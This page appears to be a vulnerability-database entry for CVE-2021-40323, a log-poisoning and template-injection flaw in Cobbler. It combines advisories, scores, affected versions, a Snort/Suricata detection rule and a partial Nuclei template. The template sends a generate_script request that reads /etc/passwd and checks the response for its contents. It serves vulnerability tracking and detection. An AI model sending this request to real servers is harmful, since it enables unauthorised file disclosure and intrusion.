CVE-2021-40323
published 2021-10-04CVE-2021-40323: Cobbler before 3.3.0 allows log poisoning, and resultant Remote Code Execution, via an XMLRPC method that logs to the logfile for template injection.
PriorityP181critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
88.48%
99.8th percentile
Cobbler before 3.3.0 allows log poisoning, and resultant Remote Code Execution, via an XMLRPC method that logs to the logfile for template injection.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cobbler_project | cobbler | <= 3.3.0 | — |
| cobbler_project | cobbler | >= 0 < 3.3.0 | 3.3.0 |
| cobbler_project | cobbler | >= 0 < d8f60bbf14a838c8c8a1dba98086b223e35fe70a | d8f60bbf14a838c8c8a1dba98086b223e35fe70a |
| cobbler_project | cobbler | >= 0 < 2.4.1-0ubuntu2+esm1 | 2.4.1-0ubuntu2+esm1 |
Detection & IOCsextracted from sources · hover to see the quote
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Clobber API XMLRPC Template Injection (CVE-2021-40323)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/cobbler_api"; fast_pattern; startswith; http.request_body; content:"|3c|methodName|3e|generate|5f|script|3c 2f|methodName|3e|"; reference:url,github.com/cobbler/cobbler/issues/2795; reference:cve,2021-40323; classtype:web-application-attack; sid:2056380; rev:1; metadata:attack_target Server, tls_state TLSDecrypt, created_at 2024_10_01, cve CVE_2021_40323, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag Exploit, updated_at 2024_10_01, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
bytes
|3c|methodName|3e|generate|5f|script|3c 2f|methodName|3e|
- →Exploit traffic is an HTTP POST to /cobbler_api with an XML body containing the 'generate_script' method name. Detect by matching POST method, URI /cobbler_api, and request body containing the XML-encoded methodName tag for generate_script. ↗
- →The exploit uses the generate_script XMLRPC method with unsanitized parameters to achieve arbitrary file read (e.g., /etc/passwd) and template injection RCE via the Cheetah template engine. ↗
- →Successful exploitation responses will be HTTP 200 with Content-Type text/xml and may contain /etc/passwd content matching patterns like 'root:.*:0', 'bin:.*:1', or 'nobody:.*:99'.
- →The attack leverages log poisoning via XMLRPC to inject Cheetah template directives into the Cobbler logfile, which are then executed server-side, resulting in RCE.
- ·The vulnerability only affects Cobbler versions before 3.3.0. Red Hat Enterprise Linux 8 (rhn-tools:1.0/cobbler) is listed as Not Affected. ↗
- ·The Snort/ET rule (sid:2056380) requires TLS decryption (SSLDecrypt deployment) to inspect encrypted HTTPS traffic to the Cobbler API endpoint.
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv4.0MEDIUM
vendor_redhat9.8CRITICAL
vendor_ubuntu4.0MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
Cobbler vulnerabilities
vendor_ubuntu·2023-11-13·CVSS 4.0
CVE-2021-40323 [MEDIUM] Cobbler vulnerabilities
Title: Cobbler vulnerabilities
Summary: Several security issues were fixed in Cobbler.
It was discovered that Cobbler did not properly handle user input, which
could result in an absolute path traversal. An attacker could possibly
use this issue to read arbitrary files. (CVE-2014-3225)
It was discovered that Cobbler did not properly handle user input, which
could result in command injection. An attacker could possibly use this
issue to execute arbitrary code with high privileges.
(CVE-2017-1000469, CVE-2021-45082)
It was discovered that Cobbler did not properly hide private functions in
a class. A remote attacker could possibly use this issue to gain high
privileges and upload files to an arbitrary location.
(CVE-2018-10931, CVE-2018-1000225, CVE-2018-1000226)
Nicolas Chatelain discov
Red Hat
cobbler: Arbitrary File Disclosure/Template Injection via generate_script RPC method
vendor_redhat·2021-09-20·CVSS 9.8
CVE-2021-40323 [CRITICAL] CWE-200 cobbler: Arbitrary File Disclosure/Template Injection via generate_script RPC method
cobbler: Arbitrary File Disclosure/Template Injection via generate_script RPC method
Cobbler before 3.3.0 allows log poisoning, and resultant Remote Code Execution, via an XMLRPC method that logs to the logfile for template injection.
A flaw was found in cobbler. This flaw lies in the generate_script RPC method, which accepts unsanitized parameters. This flaw allows an attacker to read arbitrary files on the system as root. Further, the attacker could gain arbitrary code execution using template injection against the default Cheetah template engine, leading to the exposure of sensitive information or execution of arbitrary code. The highest threat from this vulnerability is to confidentiality and integrity.
Package: rhn-tools:1.0/cobbler (Red Hat Enterprise Linux 8) - Not affected
OSV
cobbler vulnerabilities
osv·2023-11-13·CVSS 4.0
CVE-2014-3225 [MEDIUM] cobbler vulnerabilities
cobbler vulnerabilities
It was discovered that Cobbler did not properly handle user input, which
could result in an absolute path traversal. An attacker could possibly
use this issue to read arbitrary files. (CVE-2014-3225)
It was discovered that Cobbler did not properly handle user input, which
could result in command injection. An attacker could possibly use this
issue to execute arbitrary code with high privileges.
(CVE-2017-1000469, CVE-2021-45082)
It was discovered that Cobbler did not properly hide private functions in
a class. A remote attacker could possibly use this issue to gain high
privileges and upload files to an arbitrary location.
(CVE-2018-10931, CVE-2018-1000225, CVE-2018-1000226)
Nicolas Chatelain discovered that Cobbler did not properly handle user
input, which coul
OSV
Cobbler before 3.3.0 allows log poisoning
osv·2021-10-05
CVE-2021-40323 [HIGH] Cobbler before 3.3.0 allows log poisoning
Cobbler before 3.3.0 allows log poisoning
Cobbler before 3.3.0 allows log poisoning, and resultant Remote Code Execution, via an XMLRPC method that logs to the logfile for template injection.
GHSA
Cobbler before 3.3.0 allows log poisoning
ghsa·2021-10-05
CVE-2021-40323 [HIGH] CWE-94 Cobbler before 3.3.0 allows log poisoning
Cobbler before 3.3.0 allows log poisoning
Cobbler before 3.3.0 allows log poisoning, and resultant Remote Code Execution, via an XMLRPC method that logs to the logfile for template injection.
OSV
CVE-2021-40323: Cobbler before 3
osv·2021-10-04
CVE-2021-40323 CVE-2021-40323: Cobbler before 3
Cobbler before 3.3.0 allows log poisoning, and resultant Remote Code Execution, via an XMLRPC method that logs to the logfile for template injection.
Suricata
ET WEB_SPECIFIC_APPS Clobber API XMLRPC Template Injection (CVE-2021-40323)
suricata·2024-10-01·CVSS 9.8
CVE-2021-40323 [CRITICAL] ET WEB_SPECIFIC_APPS Clobber API XMLRPC Template Injection (CVE-2021-40323)
ET WEB_SPECIFIC_APPS Clobber API XMLRPC Template Injection (CVE-2021-40323)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Clobber API XMLRPC Template Injection (CVE-2021-40323)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/cobbler_api"; fast_pattern; startswith; http.request_body; content:"|3c|methodName|3e|generate|5f|script|3c 2f|methodName|3e|"; reference:url,github.com/cobbler/cobbler/issues/2795; reference:cve,2021-40323; classtype:web-application-attack; sid:2056380; rev:1; metadata:attack_target Server, tls_state TLSDecrypt, created_at 2024_10_01, cve CVE_2021_40323, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag Exploit, updated_at 2024_10_01, mitre_tactic_id T
Nuclei
Cobbler <3.3.0 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2021-40323 [CRITICAL] Cobbler <3.3.0 - Remote Code Execution
Cobbler
find_profile
name
*
- |
POST {{BaseURL}}/cobbler_api HTTP/1.1
Host: {{Hostname}}
Content-Type: text/xml
generate_script
{{profile}}
/etc/passwd
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'text/xml'
- type: regex
regex:
- "root:.*:0"
- "bin:.*:1"
- "nobody:.*:99"
condition: or
- type: status
status:
- 200
extractors:
- type: regex
name: profile
group: 1
regex:
- '(.*?)'
internal: true
# digest: 4a0a00473045022100865bb5cde116ddfcc714ad3b3635fc519fc62fc4fbd1fa5249f8e0fc0029477e022010804267594f2f48ef48c67dc5e7d555bd5ad528576e6e904a811c8727a75b7b:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
2021-10-04
Published